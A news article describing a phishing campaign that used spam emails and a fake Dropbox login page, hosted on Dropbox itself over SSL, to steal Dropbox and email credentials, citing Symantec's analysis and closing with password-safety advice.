Seven million Dropbox users recently lost their login and password credentials due to a major leak and users of the cloud storage service have now become victims of a major phishing attack.
The attack, spread by thousands of spam emails, invited users to download a recently sent file by clicking on the link provided in the message.
The scam utilizes an email with the subject ‘important’ and it claims the recipient has been sent a document that was too big to be sent by email, or cannot be sent by email for security reasons.
It goes on to claim the document can be viewed by clicking on the link inside the message. However, the link redirects to a fake Dropbox login page, hosted on Dropbox itself. This particular page is hosted on user content domains as regular files are and is served via SSL, which makes the attack more dangerous.
The scammers are using the page for more than Dropbox credentials; they are also using logos of popular email services, suggesting that users can also gain access with these credentials. After users ‘log in’, their credentials are sent to a PHP script on a compromised Web server. Credentials are also submitted over SSL, which is important for the attack to be effective. Otherwise, a security warning would have been prompted to the users.
“The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications,” explained Symantec’s (the security firm that detailed the working of the attack) Nick Johnson.
The attack is more sophisticated than the average phishing attack as the hackers have hosted the page on Dropbox’s own servers and an SSL encrypted connection is being used, bypassing the normal ‘idiot checks’ that expose low level phishing attacks.
Similar attacks were seen earlier in the year on Google Docs cloud storage service.
Users are inquisitive to see what the file is about, so the likelihood of them clicking the link is high. Once on a phony site, they are asked to log in, after which their credentials are sent to cyber criminals. Then they are redirected to the actual login page of the service cyber criminals portrayed on the phony page, tricking them to believe that nothing really happened.
Criminals also used shortened URLs to point victims to phishing domains requesting several different types of credentials.
A single landing page requested Yahoo, Gmail, AOL, Windows Live and any other account via the option called ‘Other emails’. The landing pages were created to mimic Google Docs, Microsoft OneDrive or Facebook, despite the former re-launching as Google Drive.
To protect yourself against such attacks, follow best practices such as never opening suspicious email attachments and regularly changing all your passwords. Especially think about changing passwords to email accounts, social networks and online banking.